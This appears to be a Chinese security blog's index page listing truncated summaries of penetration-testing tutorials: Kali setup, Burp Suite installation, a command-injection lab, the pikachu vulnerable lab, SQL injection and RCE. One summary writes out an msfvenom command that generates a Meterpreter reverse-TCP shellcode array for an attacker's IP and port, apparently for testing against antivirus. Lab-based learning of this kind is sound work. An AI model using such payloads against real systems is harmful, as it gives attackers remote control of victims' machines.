梧先生、

摘要： 更改apt源 sudo vi /etc/apt/sources.list 更改好源后 保存。 使用apt updata更新 sudo apt update 更新apt源。发现报错 解决方法 直接调用下方命令下载并添加kali官方密钥 wget -q -O - https://archive.kali 阅读全文

摘要： 环境准备 本文使用 jdk1.8版本 burpsuite pro 2025版 安装jdk 双击打开安装包 点击下一步，可点击更改安装文件夹，或者默认安装也许 更改好安装路径后，点击下一步，再次更改jar的安装路径，默认安装也可以， 更改好后，再次点击下一步，等待安装完成即可 环境变量设置 打开 编辑 阅读全文

摘要： （一）第一关 Lab: OS command injection, simple case 目标：通关命令注入获取用户名 进入靶场后，随意打开一个选项 页面滑倒最底下，看到Check stock 选项 选择一个选项，点击check stock提交，并使用burpsuite抓取信息包。获取到信息包后， 阅读全文

摘要： 测试工具 msfvenom、vscode，火绒安全 C语言执行 生成buf{}数组 命令： msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f c 得到buf 阅读全文

摘要： pikachu（皮卡丘） 是一个存在多种漏洞的web渗透测试靶场 下载链接：https://codeload.github.com/zhuifengshaonianhanlu/pikachu/zip/refs/heads/master phpStudy 是一个PHP调试环境的程序集成包。该程序包集成 阅读全文

摘要： SQL注入漏洞 SQL注入漏洞是一种网络安全漏洞，攻击者通过在Web应用程序的输入字段中插入恶意的SQL代码，来操纵数据库查询，从而窃取、修改或删除数据库中的敏感信息。这种漏洞通常发生在应用程序没有正确过滤用户输入的情况下。 漏洞类型 整形注入（数字型注入） UNION query SQL inje 阅读全文

摘要： 远程代码执行（Remote Code Execution，简称RCE）‌ 是一种攻击方式，其中攻击者通过远程调用的方式在目标计算机设备上执行恶意代码，从而控制该设备。这种攻击通常发生在攻击者利用远程执行代码漏洞，使得恶意程序得以在受影响的系统上运行，进而控制整个系统。 及以下需了解到的函数有： is 阅读全文